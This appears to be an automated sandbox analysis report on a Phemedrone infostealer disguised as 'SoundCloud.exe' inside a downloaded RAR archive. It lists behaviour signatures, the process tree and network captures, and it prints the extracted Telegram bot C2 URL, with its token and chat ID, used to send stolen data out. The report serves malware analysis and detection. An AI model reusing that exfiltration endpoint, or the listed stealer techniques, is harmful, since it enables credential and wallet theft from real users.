Analysis

  • max time kernel
    99s
  • max time network
    191s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    16/05/2024, 06:56 UTC

General

  • Target

    https://workupload.com/file/fkp8vSaWfcU

Malware Config

Extracted

Family

phemedrone

C2

https://api.telegram.org/bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendMessage?chat_id=-4194654645

Signatures

  • Phemedrone

    An information and wallet stealer written in C#.

  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Registers COM server for autorun 1 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 22 IoCs
  • NTFS ADS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 46 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://workupload.com/file/fkp8vSaWfcU
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2604
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff9f90ab58,0x7fff9f90ab68,0x7fff9f90ab78
      2⤵
        PID:4988
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1612 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:2
        2⤵
          PID:4944
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
          2⤵
            PID:3552
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2156 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
            2⤵
              PID:4856
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2996 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:1
              2⤵
                PID:1656
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3016 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:1
                2⤵
                  PID:752
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4300 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
                  2⤵
                    PID:2636
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4596 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
                    2⤵
                      PID:3636
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4408 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
                      2⤵
                      • NTFS ADS
                      PID:980
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4908 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:1
                      2⤵
                        PID:3652
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4328 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:1
                        2⤵
                          PID:4932
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3256 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
                          2⤵
                            PID:1032
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3200 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
                            2⤵
                              PID:2988
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3184 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
                              2⤵
                              • NTFS ADS
                              PID:5000
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3216 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
                              2⤵
                                PID:736
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3228 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
                                2⤵
                                  PID:860
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3244 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
                                  2⤵
                                    PID:4968
                                  • C:\Users\Admin\Downloads\7z2405-x64.exe
                                    "C:\Users\Admin\Downloads\7z2405-x64.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Registers COM server for autorun
                                    • Drops file in Program Files directory
                                    • Modifies registry class
                                    • Suspicious use of SetWindowsHookEx
                                    PID:2920
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3212 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
                                    2⤵
                                      PID:776
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5264 --field-trial-handle=1824,i,665130862865928695,7188866100546017329,131072 /prefetch:8
                                      2⤵
                                        PID:1636
                                    • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                                      "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                                      1⤵
                                        PID:3984
                                      • C:\Windows\system32\OpenWith.exe
                                        C:\Windows\system32\OpenWith.exe -Embedding
                                        1⤵
                                        • Modifies registry class
                                        • Suspicious use of SetWindowsHookEx
                                        PID:648
                                      • C:\Windows\System32\rundll32.exe
                                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                        1⤵
                                          PID:1284
                                        • C:\Program Files\7-Zip\7zFM.exe
                                          "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\alright prynce v2 fr.rar"
                                          1⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Suspicious behavior: GetForegroundWindowSpam
                                          • Suspicious use of FindShellTrayWindow
                                          PID:3188
                                        • C:\Users\Admin\Desktop\SoundCloud.exe
                                          "C:\Users\Admin\Desktop\SoundCloud.exe"
                                          1⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:1848
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                            2⤵
                                            • Checks processor information in registry
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:4876
                                        • C:\Users\Admin\Desktop\SoundCloud.exe
                                          "C:\Users\Admin\Desktop\SoundCloud.exe"
                                          1⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:3168
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                            2⤵
                                            • Checks processor information in registry
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:4820
                                        • C:\Users\Admin\Desktop\SoundCloud.exe
                                          "C:\Users\Admin\Desktop\SoundCloud.exe"
                                          1⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:4384
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                            2⤵
                                            • Checks processor information in registry
                                            PID:868
                                        • C:\Windows\system32\wbem\WmiApSrv.exe
                                          C:\Windows\system32\wbem\WmiApSrv.exe
                                          1⤵
                                            PID:2924

                                          Network

                                          • flag-us
                                            DNS
                                            workupload.com
                                            chrome.exe
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            workupload.com
                                            IN A
                                            Response
                                            workupload.com
                                            IN A
                                            144.76.176.119
                                          • flag-us
                                            DNS
                                            googleads.g.doubleclick.net
                                            chrome.exe
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            googleads.g.doubleclick.net
                                            IN A
                                            Response
                                            googleads.g.doubleclick.net
                                            IN A
                                            172.217.20.162
                                          • flag-us
                                            DNS
                                            t.workupload.com
                                            chrome.exe
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            t.workupload.com
                                            IN A
                                            Response
                                            t.workupload.com
                                            IN A
                                            49.13.126.162
                                          • flag-us
                                            DNS
                                            162.20.217.172.in-addr.arpa
                                            chrome.exe
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            162.20.217.172.in-addr.arpa
                                            IN PTR
                                            Response
                                            162.20.217.172.in-addr.arpa
                                            IN PTR
                                            waw02s07-in-f162.1e100.net
                                            162.20.217.172.in-addr.arpa
                                            IN PTR
                                            par10s49-in-f2.1e100.net
                                            162.20.217.172.in-addr.arpa
                                            IN PTR
                                            waw02s07-in-f2.1e100.net
                                          • flag-us
                                            DNS
                                            fonts.gstatic.com
                                            chrome.exe
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            fonts.gstatic.com
                                            IN A
                                            Response
                                            fonts.gstatic.com
                                            IN A
                                            216.58.214.67
                                          • flag-us
                                            DNS
                                            apis.google.com
                                            chrome.exe
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            apis.google.com
                                            IN A
                                            Response
                                            apis.google.com
                                            IN CNAME
                                            plus.l.google.com
                                            plus.l.google.com
                                            IN A
                                            142.250.178.142
                                          • flag-us
                                            DNS
                                            237.202.12.49.in-addr.arpa
                                            chrome.exe
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            237.202.12.49.in-addr.arpa
                                            IN PTR
                                            Response
                                            237.202.12.49.in-addr.arpa
                                            IN PTR
                                            static.237.202.12.49.clients.your-server.de
                                          • flag-us
                                            DNS
                                            ip-api.com
                                            chrome.exe
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            ip-api.com
                                            IN A
                                            Response
                                            ip-api.com
                                            IN A
                                            208.95.112.1
                                          • flag-de
                                            GET
                                            https://workupload.com/file/fkp8vSaWfcU
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /file/fkp8vSaWfcU HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            sec-ch-ua-platform: "Windows"
                                            Upgrade-Insecure-Requests: 1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Sec-Fetch-Site: none
                                            Sec-Fetch-Mode: navigate
                                            Sec-Fetch-User: ?1
                                            Sec-Fetch-Dest: document
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:04 GMT
                                            Server: Apache
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Content-Length: 1572
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                          • flag-de
                                            GET
                                            https://workupload.com/js/39b9ad5.js?v=KUUBLAOP
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /js/39b9ad5.js?v=KUUBLAOP HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: */*
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: script
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:04 GMT
                                            Server: Apache
                                            Last-Modified: Sun, 07 Jan 2024 18:35:49 GMT
                                            ETag: "59171-60e5f59ac742c-gzip"
                                            Accept-Ranges: bytes
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Cache-control: public, max-age=3600
                                            Keep-Alive: timeout=5, max=99
                                            Connection: Keep-Alive
                                            Transfer-Encoding: chunked
                                            Content-Type: application/javascript
                                          • flag-de
                                            GET
                                            https://workupload.com/fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-300.woff2
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-300.woff2 HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            Origin: https://workupload.com
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: */*
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: font
                                            Referer: https://workupload.com/css/4280ebd.css?v=KUUBLAOP
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:05 GMT
                                            Server: Apache
                                            Last-Modified: Sun, 07 Jan 2024 18:35:49 GMT
                                            ETag: "c3a4-60e5f59ac648c"
                                            Accept-Ranges: bytes
                                            Content-Length: 50084
                                            Keep-Alive: timeout=5, max=98
                                            Connection: Keep-Alive
                                            Content-Type: font/woff2
                                          • flag-de
                                            GET
                                            https://workupload.com/css/4280ebd.css?v=KUUBLAOP
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /css/4280ebd.css?v=KUUBLAOP HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: text/css,*/*;q=0.1
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: style
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:04 GMT
                                            Server: Apache
                                            Last-Modified: Fri, 23 Feb 2024 14:17:19 GMT
                                            ETag: "34295-6120d37c4bb6c-gzip"
                                            Accept-Ranges: bytes
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Cache-control: public, max-age=3600
                                            Content-Length: 35970
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: text/css
                                          • flag-de
                                            GET
                                            https://workupload.com/bundles/app/img/workupload_logo_medium.svg
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /bundles/app/img/workupload_logo_medium.svg HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:05 GMT
                                            Server: Apache
                                            Last-Modified: Sun, 07 Jan 2024 18:35:49 GMT
                                            ETag: "1936-60e5f59ac454c-gzip"
                                            Accept-Ranges: bytes
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Cache-control: public, max-age=3600
                                            Content-Length: 2965
                                            Keep-Alive: timeout=5, max=99
                                            Connection: Keep-Alive
                                            Content-Type: image/svg+xml
                                          • flag-de
                                            GET
                                            https://workupload.com/puzzle
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /puzzle HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            Accept: application/json, text/javascript, */*; q=0.01
                                            X-Requested-With: XMLHttpRequest
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:05 GMT
                                            Server: Apache
                                            Set-Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%226lFpElVSnJPd4zuGDnERJ08%5C%2FiG27r%5C%2FBAl6LmoDLdbSXzB%2BRMLU6N7D1Y39hZ7p%5C%2FpmMUSw%5C%2FJPYRAa4g9KLilVaFbmquQNxDUVOj%5C%2FoYrdHmyE9N5d7PMDi%5C%2FKgpFEGMzy0AUTOnm3JicitGzGCbd0o%2BowoL4SY%2BbPQxc9coy1g8ngs%3D%22%7D; expires=Sat, 15-Jun-2024 06:57:05 GMT; Max-Age=2592000; path=/; domain=.workupload.com
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Content-Length: 221
                                            Keep-Alive: timeout=5, max=98
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                          • flag-de
                                            GET
                                            https://t.workupload.com/matomo.js
                                            chrome.exe
                                            Remote address:
                                            49.13.126.162:443
                                            Request
                                            GET /matomo.js HTTP/1.1
                                            Host: t.workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: */*
                                            Sec-Fetch-Site: same-site
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: script
                                            Referer: https://workupload.com/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:05 GMT
                                            Server: Apache/2.4.57 (Debian)
                                            Last-Modified: Thu, 07 Mar 2024 23:35:49 GMT
                                            ETag: "1042f-6131a8902bf40-gzip"
                                            Accept-Ranges: bytes
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Content-Length: 21709
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: text/javascript
                                          • flag-de
                                            POST
                                            https://t.workupload.com/matomo.php?action_name=workupload%20-%20Are%20you%20a%20human%3F&idsite=1&rec=1&r=623249&h=6&m=57&s=4&url=https%3A%2F%2Fworkupload.com%2Ffile%2Ffkp8vSaWfcU&_id=&_idn=1&send_image=0&_refts=0&pv_id=34f1G1&pf_net=217&pf_srv=35&pf_tfr=1&pf_dm1=207&uadata=%7B%22fullVersionList%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%22110.0.5481.104%22%7D%2C%7B%22brand%22%3A%22Not%20A(Brand%22%2C%22version%22%3A%2224.0.0.0%22%7D%2C%7B%22brand%22%3A%22Google%20Chrome%22%2C%22version%22%3A%22110.0.5481.104%22%7D%5D%2C%22mobile%22%3Afalse%2C%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2214.0.0%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720
                                            chrome.exe
                                            Remote address:
                                            49.13.126.162:443
                                            Request
                                            POST /matomo.php?action_name=workupload%20-%20Are%20you%20a%20human%3F&idsite=1&rec=1&r=623249&h=6&m=57&s=4&url=https%3A%2F%2Fworkupload.com%2Ffile%2Ffkp8vSaWfcU&_id=&_idn=1&send_image=0&_refts=0&pv_id=34f1G1&pf_net=217&pf_srv=35&pf_tfr=1&pf_dm1=207&uadata=%7B%22fullVersionList%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%22110.0.5481.104%22%7D%2C%7B%22brand%22%3A%22Not%20A(Brand%22%2C%22version%22%3A%2224.0.0.0%22%7D%2C%7B%22brand%22%3A%22Google%20Chrome%22%2C%22version%22%3A%22110.0.5481.104%22%7D%5D%2C%22mobile%22%3Afalse%2C%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2214.0.0%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720 HTTP/1.1
                                            Host: t.workupload.com
                                            Connection: keep-alive
                                            Content-Length: 0
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-platform: "Windows"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                            Accept: */*
                                            Origin: https://workupload.com
                                            Sec-Fetch-Site: same-site
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: empty
                                            Referer: https://workupload.com/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%226lFpElVSnJPd4zuGDnERJ08%5C%2FiG27r%5C%2FBAl6LmoDLdbSXzB%2BRMLU6N7D1Y39hZ7p%5C%2FpmMUSw%5C%2FJPYRAa4g9KLilVaFbmquQNxDUVOj%5C%2FoYrdHmyE9N5d7PMDi%5C%2FKgpFEGMzy0AUTOnm3JicitGzGCbd0o%2BowoL4SY%2BbPQxc9coy1g8ngs%3D%22%7D
                                            Response
                                            HTTP/1.1 204 No Response
                                            Date: Thu, 16 May 2024 06:57:05 GMT
                                            Server: Apache/2.4.57 (Debian)
